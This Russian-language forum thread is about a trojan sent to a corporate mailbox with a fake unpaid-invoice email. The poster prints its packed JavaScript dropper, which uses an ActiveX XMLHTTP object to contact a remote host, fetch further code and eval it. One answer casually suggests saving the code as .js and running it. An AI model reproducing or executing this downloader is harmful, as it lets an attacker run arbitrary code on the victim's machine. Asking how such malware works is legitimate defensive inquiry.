@DanXai

Какую уязвимость использует этот троян?

Доброго времени суток! На корпоративную почту пришел очередной троян с таким содержанием письма:
День добрый. Сообщаем о том, что вы не заплатили всю сумму за оказанные услуги (см. отчеты во вложении). Просьба провести расчет до пятницы, иначе автоматически начнет начисляться пеня. Если возникли вопросы по прикрепленным документам, ждем обратной связи.

Внутри -- файл с именем "Реквизиты_для_расчета(услуги) рdf.zip"
Если открыть файл в текстовом редакторе, то видна сигнатура заголовка PK, потом идет некий JS-код:
/// 44bd2d8b8809da6d917416e1ff6cd9ab
/// 4754ac4cfd566dd8a504bbe8a0cded41
eval(function(c,e,a,b,d,f){d=function(a){return a.toString(36)};if(!"".replace(/^/,String)){for(;a--;)f[a.toString(e)]=b[a]||a.toString(e);b=[function(a){return f[a]}];d=function(){return"\\w+"};a=1}for(;a--;)b[a]&&(c=c.replace(new RegExp("\\b"+d(a)+"\\b","g"),b[a]));return c}('d 5=["e.f","c","b://7.9","8","g"],a=i h(5[0]);a[5[3]](5[1],5[2],0);a[5[4]]();a[5[3]](5[1],a.6,0);a[5[4]]();j(a.6);',20,20," _0xc332 ResponseText flexured open com http GET var MSXML2 XMLHTTP send ActiveXObject new eval".split(" "),
/// a34b1357c2cf94df8166efc8393669d3
/// 937512e44a4023a51be3472c93e14b06
/// a562cf96b2a9fdc3ae1ab0f5abd09baf
/// 70528b780de8760978cfb3cb56025709
/// 48767e01b9f7766c7536f4261d5effad
/// 7cfe91ef2168145f28bbbfe5df31110d
0,{}));

Ссылка на вирустотале:
https://www.virustotal.com/ru/file/7b66c3ad45b5394...
Вирустотал выдал еще такую инфу:
ZipFileName: ??? ?????? - ?????? - ?? ?? 27-?? ???? 2016?. ??? ?? ? ????? ??????? ?? ???? ? ???????.??? ?? ? ???? ????.bb6ebce_txt_.js
Сам троян отправил в базу Касперского.

Такой вопрос -- а как собственно он работает? Как запускается JS-скрипт? Открыл файл в виртуалке встроенным виндовым архиватором -- система выдала, что файл поврежден.
  • Вопрос задан
  • 111 просмотров
Решения вопроса 1
Ну так может он и поврежден.
Вроде бы делается куда-то запрос, дальше возможно исполнение кода, полученного удаленно.
Разбираться лень.
Сохраните чистый код в файле с расширением .js и попробуйте запустить =)
Ответ написан
Пригласить эксперта
Ответы на вопрос 1
Rou1997
@Rou1997
Никакую, в браузере он не работает, просто рассчитан на запуск пользователем.
Ответ написан
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы